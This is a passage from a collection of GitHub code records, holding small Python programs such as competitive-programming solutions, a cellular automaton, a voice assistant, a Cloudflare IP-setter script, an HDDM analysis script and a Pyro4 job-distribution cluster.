list(reversed(ascending_list))\r\n ascending_string = ''.join(ascending_list)\r\n descending_string = ''.join(descending_list)\r\n temp = []\r\n\r\n for i in range(size):\r\n temp.append('-'.join(list(f\"{descending_string[0: i]}{descending_list[i]}{ascending_string[size - i:size]}\")))\r\n\r\n for i in range(size - 1):\r\n temp.append('-'.join(list(f\"{descending_string[0: (size - 2) - i]}{list(ascending_list[1:size])[i]}{ascending_string[i + 2:size]}\")))\r\n\r\n s = ''\r\n\r\n for each in temp:\r\n s = s + each.center(len(temp[size - 1]), '-') + '\\n'\r\n\r\n return s\r\n\r\n\r\nif __name__ == '__main__':\r\n n = int(input())\r\n print(print_rangoli(n))\r\n","repo_name":"Thamizhiniyan18/HackerRank","sub_path":"Python/23 - Alphabet Rangoli.py","file_name":"23 - Alphabet Rangoli.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72118962727","text":"import random\n\n\nclass Automat:\n def __init__(self, N, reg, rand):\n self.ciag = [random.randint(0, 1) if rand else 0 for _ in range(N)]\n self.ciag[N // 2] = 1 if not rand else self.ciag[N // 2]\n self.output = [self.ciag]\n reg = bin(reg)\n self.reg = []\n for ch in reg[2:]:\n self.reg.append(int(ch))\n for index in range(len(self.reg), 8):\n self.reg = [0] + self.reg\n print(self.reg)\n\n def evol(self):\n x = self.ciag[:]\n for i in range(len(self.ciag)):\n self.ciag[i] = self.reg[x[-i + 1] * 4 + x[i] * 2 + (x[-i - 1]) if i != len(x) - 1 else x[0]]\n self.output.append(self.ciag[:])\n\n def __str__(self):\n result = \"\"\n for x in self.output:\n for el in x:\n result += \"*\" if el else \" \"\n result += \"\\n\"\n return result\n\n\na = Automat(50, 90, False)\nprint(a.ciag)\nprint(a.reg)\nfor _ in range(200):\n a.evol()\nprint(a.ciag)\n\nprint(a)\n","repo_name":"BIGbadEL/Python_lab_2018-2019","sub_path":"Lab9/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32909388690","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom five_ui import Ui_MainWindow as five_ui_windows\nfrom PyQt5.QtCore import QTimer, pyqtSignal\n\n\nclass fiveWindows(QtWidgets.QMainWindow,five_ui_windows):\n signal_list = pyqtSignal(str)\n \n def __init__(self,result,parent=None):\n super().__init__(parent)\n super(fiveWindows,self).__init__(parent)\n self.setupUi(self)\n self.label.setText(\"\")\n self.label.setStyleSheet(\"border-image:url(rgb.jpg);\")\n self.label_3.setText(result)\n\nif __name__ == '__main__':\n import sys\n app = QtWidgets.QApplication(sys.argv)\n win = fiveWindows()\n win.show()\n sys.exit(app.exec_())","repo_name":"restuie/ICAPD","sub_path":"five_ui_control.py","file_name":"five_ui_control.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17440920354","text":"# 괄호 : 비슷한 문제를 푼 적 있음\n# 큐가 아니라 스택으로 풀어야 함!!\nfrom collections import deque\ndef VPS(line):\n stack = deque()\n for i in line:\n if i == '(':\n stack.append(i)\n else:\n if len(stack) > 0:\n j = stack.pop()\n else:\n return 'NO'\n if len(stack) > 0:\n return 'NO'\n return 'YES'\n\nn = int(input())\nfor _ in range(n):\n line = list(input())\n print(VPS(line))","repo_name":"dodoyeon/SW_Academy","sub_path":"BFS&DFS_novice/9012_gualho.py","file_name":"9012_gualho.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70464636009","text":"from kalkboks.math import cagr\n\n__author__ = 'schien'\n\nimport unittest\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_growth(self):\n i_0 = 1\n alpha = 0.50\n t = 2\n i = cagr(i_0, alpha, t)\n self.assertEqual(i, 2.25)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"dschien/kalkboks","sub_path":"tests/math_tests.py","file_name":"math_tests.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5182165233","text":"#Antoni Smółka\nfrom zad4testy import runtests\n\n#definiuje algorytm przeszukujacy graf w szerz (BFS)\ndef bfs(G, s, t):\n visited = [False] * len(G) \n prev = [None] * len(G)\n queue = [s]\n visited[s] = True\n\n#tworze 4 tablice, z czego jedna bedzie kolejką\n\n\n while queue:\n node = queue.pop(0)\n if node == t:\n break\n\n for neighbor in G[node]:\n if not visited[neighbor]:\n visited[neighbor] = True\n prev[neighbor] = node\n queue.append(neighbor)\n\n path = []\n if not visited[t]:\n return None\n\n current = t\n while current is not None:\n path.append(current)\n current = prev[current]\n path.reverse()\n return path\n\n #algorytm zwraca najkrotsza sciezke przedstawiona przy pomocy wierzcholkow pomiedzy s i t\n\ndef longer( G, s, t ):\n path = bfs(G, s, t)\n if not path:\n return None\n\n for i in range(len(path) - 1):\n u, v = path[i], path[i + 1]\n\n # usuwam krawędź uv z grafu\n G[u].remove(v)\n G[v].remove(u)\n\n # ponownie stostuje bfs zeby sprawdzic czy mimo usuniecia krawedzi istnieje sciezka \n # nowa zmienna zawiera sciezke w grafie z usunieta krawedzia\n new_path = bfs(G, s, t)\n\n #porownuje czy sciezka po usunieciu krawedzi jest dluzsza od sciezki w grafie pierwotnym, jesli tak to zwracam usunieta krawedz\n\n if not new_path or len(new_path) > len(path):\n return (u, v)\n\n return None\n\n \n\n\n# zmien all_tests na True zeby uruchomic wszystkie testy\nruntests( longer, all_tests = True )\n\n\n#złozonosc to O(V(V+E)) - V+E zlozonosc BFSa a V to zlozonosc petli for w funkcji longer(w najgorszym wypadku przechodzi przez wszystkie wierzcholki i wtedy wynosi V)\n","repo_name":"youngbucu/Studia","sub_path":"ASD/zad4/zad4ANTON.py","file_name":"zad4ANTON.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72387506728","text":"import string, re, itertools, time\n\nimport sys\n\nif sys.version[0]=='2':\n maketrans = string.maketrans\nelse:\n maketrans = str.maketrans\n \ndef valid(f):\n \"debe evaluar la cadena\"\n pass\n \ndef fill_in(formula):\n \"generar todas las formulas posibles de las letras con digitos\"\n letters = ''.join(set(re.findall('[A-Z]', formula))) #should be a string\n for digits in itertools.permutations('1234567890', len(letters)):\n table = maketrans(letters, ''.join(digits))\n yield formula.translate(table)\n \ndef solve(formula):\n \"\"\"Dada una formula como 'ODD + ODD == EVEN', encontrar los \n digitos que puedan resolverla.\n entrada: formula es una cadena; \n salida: es una cadena de con los digitos que son correctos\"\"\"\n l = []\n # ENCONTRAR TODAS LOS VALORES REALES\n print(\"%d SOLUCIONES ENCONTRADAS PARA LA FORMULA\"%(len(l)))\n if(len(l))>0:\n print(\"ej. %s\"%(l[0]))\n return l\n \nexamples = \"\"\"TWO + TWO == FOUR\nGLITTERS is not GOLD\nATOM**0.5 == A + TO + M\n\"\"\".splitlines()\n\ndef test():\n t0 = time.time()\n for example in examples:\n print('\\n '+13*' '+str(example))\n print('%6.4f sec.' % timedcall(solve, example))\n print('%6.4f tot.' % (time.time()-t0))\n\ndef timedcall(fn, *args):\n \"Call function with args; return the time in seconds and result.\"\n t0 = time.time()\n result = fn(*args)\n t1 = time.time()\n return t1-t0\n\ntest()\n","repo_name":"lennin92/curso_python","sub_path":"semana_3/cripto_aritmetica/fuerza_bruta.py","file_name":"fuerza_bruta.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27185951010","text":"N,K = map(int,input().split(\" \"))\nans = 0\nfor b in range(K+1,N+1):\n\tk = ((N - K) // b)\n\tnum = min(((N - K) % b) + 1,b-K)\n\tans += ((b - K) * (k + 1) - ((b - K) - num))\nif K == 0:\n\tprint(ans - N)\nelse:\n\tprint(ans)","repo_name":"banboooo044/AtCoder","sub_path":"ARC091/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15591359636","text":"# http://codeforces.com/problemset/problem/242/B\n\"\"\"\nWe will try to get all indexs of segment has min start , and max value of end\njust loop per index of segment which have min start , if they has end value is equal with max value of end => break\n=> we find it / this algo is O(n)\n\"\"\"\n\nnum_segments = int(input())\nstart_segments = []\nend_segments = []\n\n\ndef find_max_of_end(my_list): # O(n)\n max = my_list[0]\n for index, item in enumerate(my_list):\n if item > max:\n max = item\n return max\n\n\ndef find_index_of_min(my_list): #O(n)\n min = my_list[0]\n min_indexs = []\n for index, item in enumerate(my_list):\n if item < min:\n min = item\n for index, item in enumerate(my_list):\n if item == min:\n min_indexs.append(index)\n return min_indexs\n\n\nfor _ in range(num_segments):\n start, end = list(map(int, input().split()))\n start_segments.append(start)\n end_segments.append(end)\n\nmin_start_indexes = find_index_of_min(start_segments)\nmax_end = find_max_of_end(end_segments)\nresult = -1\nfor index in min_start_indexes: #O(n)\n if end_segments[index] == max_end:\n result = index\n break\nif result == -1:\n print(result)\nelse:\n print(result + 1)\n\n\n\"\"\"The second way :\n1. find max of end\n2. find min of start\n3. loop per element check if the element has end = max and min = start\"\"\"","repo_name":"huyngopt1994/python-Algorithm","sub_path":"bigo/day-1-dyanimic-array-string/problem-242B.py","file_name":"problem-242B.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20963254712","text":"def str2bool(v):\n \"\"\"\n Function to parse a string representing a bool\n \"\"\"\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 'True', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'False', 'f', 'n', '0'):\n return False\n else:\n raise Exception('Boolean value expected.')\n\ndef is_tool(name):\n \"\"\"\n Check whether `name` is on PATH and marked as executable.\n\n Returns\n -------\n True if `name` exists\n \"\"\"\n\n # from whichcraft import which\n from shutil import which\n\n return which(name) is not None","repo_name":"igsr/igsr_archive","sub_path":"igsr_archive/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14536659164","text":"import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\nimport wikipedia\nimport pyjokes\nfrom gnewsclient import gnewsclient\n\n__listener = sr.Recognizer()\n__engine = pyttsx3.init()\n__voices = __engine.getProperty(\"voices\")\n__engine.setProperty(\"voice\", __voices[40].id) # 40 is for en_IN, Female voice\n__ext_responses = {}\n__ext_phrases = []\n\ndef __listen_all_voices__():\n index = 0\n for voice in __voices:\n print(i, voice, voice.id)\n __engine.setProperty(\"voice\", voice.id)\n __engine.say(\"Hello World!\")\n __engine.runAndWait()\n index += 1\n\ndef set_voice(voice_num):\n if voice_num in [0, 7, 10, 11, 17, 28, 32, 33, 37, 40, 41]:\n __engine.setProperty(\"voice\", __voices[voice_num].id)\n else:\n raise Exception(\"No voice number found!\")\n\n############# Misc Functions #################\ndef erase_from_voice(voice, *phrases, debug = False):\n if voice == None or voice.strip() == '': \n return \"\"\n\n if phrases == None: \n return \"\"\n\n voice_filtered = voice.strip()\n\n for arg in phrases:\n voice_filtered = voice_filtered.replace(arg,\"\").strip()\n \n if debug:\n print(\"Voice:\", voice)\n print(\"Phrase:\", phrase)\n print(\"Voice filtered:\", voice_filtered)\n \n return voice_filtered\n\ndef get_joke():\n return pyjokes.get_joke()\n\n############# Speaking #################\ndef speak(phrase, debug = True):\n if phrase == None or phrase.strip() == '':\n return\n\n phrase = phrase.strip()\n if \"\\n\" in phrase:\n [speak_single(curr, debug) for curr in phrase.split(\"\\n\")]\n else:\n speak_single(phrase)\n \ndef speak_single(phrase, debug = True):\n if phrase == None or phrase.strip() == '':\n return\n phrase = phrase.strip()\n\n if debug:\n print(phrase)\n __engine.say(phrase)\n __engine.runAndWait()\n############# Listening #################\ndef listen():\n voice_input = \"\"\n try:\n print(\"Listening...\")\n with sr.Microphone() as source:\n voice = __listener.listen(source)\n voice_input = __listener.recognize_google(voice)\n voice_input = voice_input.lower()\n except:\n print(\"Error in taking voice input\")\n return voice_input\n\n############# Google News #################\ndef get_google_news(debug = False):\n client = gnewsclient.NewsClient(language = 'english',\n location = 'India',\n max_results=10)\n news_to_str = ''\n for news in client.get_news():\n news_to_str += (news['title'] + \".\\n\")\n\n if debug:\n print(\"News To Str: \", news_to_str)\n return news_to_str\n\n############# Time Functions #################\ndef get_time_in_gmt(debug = False):\n time = datetime.datetime.now(datetime.timezone.utc)\n if debug:\n print(time)\n return time\n\ndef get_delta_time(hours, minutes):\n return datetime.timedelta(0, (hours * 60 + minutes) * 60)\n\ndef convert_time(utc_time, code, debug = False):\n hours = 5\n minutes = 30\n\n if \"ist\" in code:\n pass\n elif \"aedt\" in code:\n hours = 11\n minutes = 0\n \n elif \"pdt\" in code:\n hours = -7\n minutes = 0\n\n elif \"gmt\" in code or \"utc\" in code:\n hours = 0\n minutes = 0\n\n elif \"cst\" in code:\n hours = -6\n minutes = 0\n\n elif \"brt\" in code or \"brst\" in code:\n hours = -3\n minutes = 0\n\n elif \"sast\" in code:\n hours = 2\n minutes = 0 \n\n elif \"jst\" in code:\n hours = 9\n minutes = 0\n else:\n print(\"hours: \", hours)\n print(\"minutes: \", minutes)\n print(\"code: \", code)\n print(\"utc_time: \", utc_time)\n raise Exception(\"Conversion not found to the required code\")\n\n if debug == True:\n print(\"hours: \", hours)\n print(\"minutes: \", minutes)\n print(\"code: \", code)\n print(\"utc_time: \", utc_time)\n\n time_new = (utc_time + get_delta_time(hours, minutes))\n return time_new.strftime(\"%I:%M %p\")\n\n############# Playing Song #################\ndef play_on_youtube(song):\n speak(\"playing \" + song)\n pywhatkit.playonyt(song)\n\n############# Custom Response #################\ndef save_response(phrase, response, debug = False):\n global __ext_responses\n \n if phrase == None or phrase.strip() == '': \n return\n \n __ext_responses[phrase.strip()] = response.strip()\n\n\ndef __contains_response(phrase, debug = False):\n global __ext_responses\n\n if phrase == None or phrase.strip() == '': \n return False\n \n phrase = phrase.strip()\n return (phrase in __ext_responses)\n \ndef get_response(phrase, debug = False):\n global __ext_responses\n\n if phrase == None or phrase.strip() == '': \n return \"\"\n \n phrase = phrase.strip()\n if __contains_response(phrase, debug):\n if debug:\n print(\"Response: \", __ext_responses[phrase])\n return __ext_responses[phrase]\n else:\n if debug:\n print(\"Does not contain phrases\")\n return \"\"\n\n############# Exit #################\ndef add_exit_phrases(phrase):\n global __ext_phrases\n \n __ext_phrases.append(phrase)\n\ndef contains_exit_phrase(phrase):\n global __ext_phrases\n\n if phrase == None or phrase.strip() == '': \n return False\n \n phrase = phrase.strip()\n if phrase in __ext_phrases:\n return True\n return False\n","repo_name":"KidBit-Academy/kidbit_assistant","sub_path":"kidbit_assistant/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15202070909","text":"from cf_api import CFApi\nfrom scan import scan, find_last_result\nfrom retrieve_ips import retrieve_ips\nimport json\nimport os \nfrom sys import argv\n\nenv_path = None\nfor argument in argv:\n if (argument.startswith(\"--config=\")):\n env_path = argument.replace('--config=', '')\n\nif env_path == None:\n dir_path = os.path.dirname(os.path.realpath(__file__))\n env_path = os.path.join(dir_path, \"config.json\")\n\nconfig = json.loads(open(env_path).read())\n\nif config['use_provided_result'] == False:\n retrieve_ips(config)\n scan(config['output_file'], config['scan_concurrency'], config['upload_speed'], config['custom_config'])\n config['last_result_path'] = find_last_result()\n\n\ncfApi = CFApi(config['email'], config['global_key'], config['zone_id'])\ncfApi.replace_ips(config['last_result_path'], config['max_no_records'], config['sub_domain'])\n","repo_name":"miadabdi/CF-Clean-IP-Setter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19432214313","text":"#just a very rough initial example of applying HDDM to ACT-R RT results\n\nimport hddm\nimport matplotlib.pyplot as plt\n\n#folder = '/home/ausmanpa/Documents/gp/ACTR_DDM/simulations/'\nfolder = '/actr/models/ACTR_DDM/simulations/'\nfname = 'test.csv'\n\ndata = hddm.load_csv(folder+fname)\n\n#the column names need to be adjusted (there are spaces in front of the actual name)\ncolNames = data.columns\nhddmData = data.rename(index=str, columns={'idx':'subj_idx',\n colNames[1]:colNames[1][1:],\n colNames[2]:colNames[2][1:],\n colNames[3]:colNames[3][1:],\n colNames[4]:colNames[4][1:],\n colNames[5]:colNames[5][1:]})\n\nprint(hddmData)\n\n#let's plot correct and error RT distributions first\nrtDistData = hddm.utils.flip_errors(hddmData)\nfig = plt.figure()\nax = fig.add_subplot(111, xlabel='RT', ylabel='count', title='RT distributions')\nfor i, subj_data in rtDistData.groupby('subj_idx'):\n subj_data.rt.hist(bins=20, histtype='step', ax=ax)\n \n\n#create model object where drift-rate v depends on the difficulty\nmodel = hddm.HDDM(hddmData, depends_on={'v':'stim'})\n\n#find a good starting point to help with convergence - but, seems to run into a warning/error\nmodel.find_starting_values()\n\n#draw 2000 samples, discard 20 as burn-in\nmodel.sample(2000, burn=20)\n\n#############################################################################################################\n\n#if we instead wanted to use the gelman-rubin statistic to check convergence, we should run multiple models:\n#this would take awhile!\nmodels=[]\nfor i in range(5):\n m = hddm.HDDM(hddmData, depends_on={'v':'stim'})\n m.find_starting_values()\n m.sample(1000,burn=10)\n models.append(m)\n \nhddm.analyze.gelman_rubin(models)\n\n#############################################################################################################\n\n#generate stats on the model results\nstats = model.gen_stats()\n\n#there are a lot of stats, so let's just look at a few\nstats[stats.index.isin(['v( easy)','v( difficult)','a','t'])]\n\n#let's plot the posteriors for these parameters\nmodel.plot_posteriors(['v','a','t']) #'v' will plot for both v( easy) and v( difficult)\n\n#this plots individual subject RT distributions on top of predictive likelihood\n#we have a lot of \"subjects\" so it's unreadable - will have to figure out argument to restrict the number of subjs plotted\nmodel.plot_posterior_predictive(figsize=(14, 10))\n\n#let's look at the posteriors of v for the two conditions\nv_Easy = model.nodes_db.node[['v( easy)']]\nhddm.analyze.plot_posterior_nodes([v_Easy[0]])\n\nv_Diff = model.nodes_db.node[['v( difficult)']]\nhddm.analyze.plot_posterior_nodes([v_Diff[0]])\n\nhddm.analyze.plot_posterior_nodes([v_Easy[0],v_Diff[0]])\nplt.xlabel('drift-rate')\nplt.ylabel('Posterior probability')\nplt.title('Posterior of drift-rate group means')\n\n#what's the posterior probability that the Easy drift rate is larger than the Difficult drift rate?\nprint('P(v_Easy > v_Diff) =', (v_Easy[0].trace() > v_Diff[0].trace()).mean())\n\n#what's the deviance information criterion (DIC; lower is better) of the model?\nprint('DIC =',model.dic)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"TheRealDrDre/ACTR_DDM","sub_path":"hddm/roughHDDM.py","file_name":"roughHDDM.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70250658410","text":"import subprocess\nimport time\nimport signal\n\ndef recieveSignal(signo, frame):\n\tprint(\"Program Paused\\n\")\n\treturn\n\nprint(\"Magnetic Flux Drum\")\nsignal.signal (signal.SIGINT, recieveSignal)\ncheck = 0\nwhile check == 0:\n\tprint(\"Press ctrl-C to stop playing\")\n\tsubprocess.call(\"./adc_readout\")\n\tans = input(\"Continue Playing?(y/n)\")\n\tif ans == 'n':\n\t\tcheck = 1\n","repo_name":"cashnn/capstone","sub_path":"Test_Programs/ADC_read_toterm/Flux_Drum.py","file_name":"Flux_Drum.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73403982248","text":"import random\nimport os, sys\nsys.path.append(os.path.abspath(os.path.join('..', '..', '..', '..', 'greed')))\nimport __main__\n\nDATA_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) + \"/data/highscore.txt\"\n\nclass Director:\n \"\"\"A person who directs the game. \n \n The responsibility of a Director is to control the sequence of play.\n\n Attributes:\n _keyboard_service (KeyboardService): For getting directional input.\n _video_service (VideoService): For providing video output.\n \"\"\"\n\n def __init__(self, keyboard_service, video_service):\n \"\"\"Constructs a new Director using the specified keyboard and video services.\n \n Args:\n keyboard_service (KeyboardService): An instance of KeyboardService.\n video_service (VideoService): An instance of VideoService.\n \"\"\"\n self._keyboard_service = keyboard_service\n self._video_service = video_service\n \n def start_game(self, cast):\n \"\"\"Starts the game using the given cast. Runs the main game loop.\n\n Args:\n cast (Cast): The cast of actors.\n \"\"\"\n self._video_service.open_window()\n while self._video_service.is_window_open():\n self._get_inputs(cast)\n self._do_updates(cast)\n self._do_outputs(cast)\n self._video_service.close_window()\n\n def _get_inputs(self, cast):\n \"\"\"Gets directional input from the keyboard and applies it to the robot.\n \n Args:\n cast (Cast): The cast of actors.\n \"\"\"\n robot = cast.get_first_actor(\"robots\")\n velocity = self._keyboard_service.get_direction()\n if (velocity.get_y() == 0):\n robot.set_velocity(velocity) \n\n def _do_updates(self, cast):\n \"\"\"Updates the robot's position and resolves any collisions with artifacts.\n \n Args:\n cast (Cast): The cast of actors.\n \"\"\"\n banner = cast.get_first_actor(\"banners\")\n robot = cast.get_first_actor(\"robots\")\n objects = cast.get_actors(\"objects\")\n\n banner.set_text(\"\")\n max_x = self._video_service.get_width()\n max_y = self._video_service.get_height()\n robot.move_next(max_x, max_y)\n\n #check and update high score\n with open(DATA_PATH,\"r\") as f:\n high_score = int(f.readline())\n if robot.get_score() > high_score:\n with open(DATA_PATH,\"w\") as f:\n f.write(str(robot.get_score())) \n banner.set_text(f\"SCORE: {robot.get_score()} HIGH SCORE: {high_score}\") \n \n #loop through objects\n for object in objects:\n try:\n #if object is sufficiently close to robot, delete object and change score\n if (abs(object.get_position().get_x() - robot.get_position().get_x()) <= 15 and \n object.get_position().get_y() >= robot.get_position().get_y() - 10):\n robot.set_score(robot.get_score() + object.get_score())\n cast.remove_actor(\"objects\", object)\n except:\n pass\n try:\n #delete objects as they exit the screen\n if object.get_position().get_y() >= max_y - 10:\n cast.remove_actor(\"objects\", object)\n else:\n object.move_next(max_x, max_y) \n except:\n pass \n #spawn new objects up to the max number allowed on the screen\n __main__.spawn_objects(cast, len(objects), robot.get_score())\n\n cast.add_actor(\"objects\", object)\n \n def _do_outputs(self, cast):\n \"\"\"Draws the actors on the screen.\n \n Args:\n cast (Cast): The cast of actors.\n \"\"\"\n self._video_service.clear_buffer()\n actors = cast.get_all_actors()\n self._video_service.draw_actors(actors)\n self._video_service.flush_buffer()","repo_name":"JRoy99/cse210-04","sub_path":"greed/game/directing/director.py","file_name":"director.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26576797821","text":"import marshal\nimport Pyro4\nfrom concurrent.futures import ThreadPoolExecutor\nfrom queue import Queue\nfrom threading import Event\nimport inspect\n\n\ndef _serialize_function(func):\n code_string = marshal.dumps(func.__code__)\n\n return code_string\n\n\ndef _get_module_name(mod):\n return inspect.getmodule(mod).__name__\n\n\ndef _get_module_source(mod):\n return inspect.getsource(mod)\n\n\nclass PendingFuture:\n \"\"\"\n Abstraction for getting the result from a job\n either returns the future object's result method\n or blocks until a future has been added when the\n job is waiting for a node to become available\n \"\"\"\n def __init__(self):\n self._future = None\n self._event = Event()\n\n def __call__(self, *args, **kwargs):\n # wait until a future object was created\n self._event.wait()\n return self._future.result()\n\n def add_future(self, future):\n self._future = future\n self._event.set()\n\n\nclass JobDoneCallable:\n \"\"\"\n Callable for when a node has finished it's current job.\n stores the node which was used to execute the job\n so it can add that node back to the queue when finished then\n return control back to the Cluster\n \"\"\"\n def __init__(self, node, callback):\n self.node = node\n self.callback = callback\n\n def __call__(self, *args, **kwargs):\n self.callback(self.node)\n\n\nclass Node:\n \"\"\"\n Each node used for executing jobs. Stores the associated id value to use, the Pyro4\n proxy object, and the number of processors available (if the node is the original)\n \"\"\"\n def __init__(self, address, port):\n self.daemon = Pyro4.Proxy(\"PYRO:dce_node@\" + address + \":\" + str(port))\n self.id = -1\n self.procs = 1\n\n\nclass Cluster:\n \"\"\"\n The main class used for distributing jobs among a list of nodes\n \"\"\"\n def __init__(self, job, node_list, module_dependencies=(), multi=False):\n \"\"\"\n Creates a new cluster and sets up the cluster to schedule new instances of the given\n job.\n :param job:\n :param node_list:\n :param module_dependencies:\n :param multi:\n \"\"\"\n self._nodes = []\n self._futures = []\n self._pending_jobs = Queue()\n self._node_queue = Queue()\n self._id = -1\n self._module_d = module_dependencies\n self._multi = multi\n\n # set up the nodes to use\n for address in node_list:\n node = Node(address[0], address[1])\n self._nodes.append(node)\n\n # get the id values to use for each\n self._get_id_values()\n\n # send any module dependencies\n self._send_modules()\n\n # send each node the entry point to use\n code_string = _serialize_function(job)\n self._setup(code_string)\n\n # set up multi-processing if set\n if self._multi:\n self._set_multi_processing()\n # if multi threaded, then add more copies of each node for the number of threads available\n for i in range(len(node_list)):\n address = node_list[i]\n original_node = self._nodes[i]\n for j in range(original_node.procs - 1):\n node = Node(address[0], address[1])\n node.id = original_node.id # copy the id value from the copy node\n self._nodes.append(node)\n\n # add each node to the queue\n for node in self._nodes:\n self._node_queue.put(node)\n\n # create the thread pool which will now be used to schedule jobs\n self.dispatcher = ThreadPoolExecutor()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.exit()\n\n def _get_id_values(self):\n results = []\n with ThreadPoolExecutor() as pool:\n # get the id value of each node to use\n for node in self._nodes:\n results.append(pool.submit(node.daemon.new_id))\n\n for i in range(len(results)):\n self._nodes[i].id = results[i].result()\n\n def _set_multi_processing(self):\n results = []\n with ThreadPoolExecutor() as pool:\n # get the number of processors in each node\n for node in self._nodes:\n results.append(pool.submit(node.daemon.get_num_processors))\n\n for i in range(len(results)):\n self._nodes[i].procs = results[i].result()\n\n def _send_modules(self):\n with ThreadPoolExecutor() as pool:\n # send the module dependency to each node\n for mod in self._module_d:\n name = _get_module_name(mod)\n source = _get_module_source(mod)\n\n for node in self._nodes:\n pool.submit(node.daemon.add_module, node.id, name, source)\n\n def _setup(self, func):\n with ThreadPoolExecutor() as pool:\n # send the given entry point function to each node\n for node in self._nodes:\n pool.submit(node.daemon.set_entry_point, node.id, func)\n\n def _add_node_to_queue(self, node):\n self._node_queue.put(node)\n self._check_for_jobs()\n\n def _check_for_jobs(self):\n if not self._pending_jobs.empty() and not self._node_queue.empty():\n params = self._pending_jobs.get()\n node = self._node_queue.get()\n\n pf = params[0]\n args = params[1]\n kwargs = params[2]\n\n self._execute(pf, node, args, kwargs)\n\n def _execute(self, pending_future, node, args, kwargs):\n fut = self.dispatcher.submit(node.daemon.execute, node.id, args=args, kwargs=kwargs)\n\n # create the callback function to use\n cal = JobDoneCallable(node, self._add_node_to_queue)\n\n fut.add_done_callback(cal)\n pending_future.add_future(fut)\n\n def execute(self, args=(), kwargs=None):\n \"\"\"\n Executes a new job using the given arguments and returns a callable object which\n returns the result of the job when ready\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n if kwargs is None: kwargs = {}\n\n # create the callable\n pf = PendingFuture()\n\n # add the \"job\" to the pending_jobs\n args = (pf, args, kwargs)\n self._pending_jobs.put(args)\n\n # call check_for_jobs\n self._check_for_jobs()\n self._futures.append(pf)\n\n # return the callable\n return pf\n\n def exit(self):\n \"\"\"\n Shuts down this Cluster instance and signals all connected nodes that this\n entry point is no longer being used\n :return:\n \"\"\"\n for node in self._nodes:\n self.dispatcher.submit(node.daemon.end_id, node.id)\n self.dispatcher.shutdown(True)\n\n\n","repo_name":"nicholas-recht/PythonCluster","sub_path":"dce.py","file_name":"dce.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"45179213020","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# project dependencies\nfrom src.common.opengl_object import OpenGlObject\nfrom src.wall import Cell\n\n# external dependencies\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\n\n\nOpenGlObject.register\nclass Projectile:\n\n def __init__(self, x, y, z, alpha) -> None:\n self.x = x\n self.y = y \n self.z = z\n self.alpha = alpha\n self.delete = False\n \n def draw(self):\n if self.z < 50:\n glPushMatrix()\n glColor3f(1, 1, 1)\n glRotatef(self.alpha, 0, 1, 0)\n glTranslated(self.x, self.y, self.z)\n glutSolidSphere(0.2, 5, 5)\n glPopMatrix()\n self.z += 1\n else:\n self.delete = True\n\n def collision(self, cell: Cell) -> bool:\n x_dist = abs(self.x - cell.x)\n y_dist = abs(self.y - cell.y)\n z_dist = abs(self.z - cell.z)\n\n return x_dist < 1.2 and y_dist < 1.2 and z_dist < 1.2","repo_name":"henriquekops/Panzer","sub_path":"src/projectile.py","file_name":"projectile.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22359617633","text":"from mapero.core.api import Module\nfrom mapero.core.api import OutputPort, InputPort\nfrom enthought.traits.api import Array, List, Str, Any, HasTraits, Float\nfrom numpy import array, resize\n\nclass 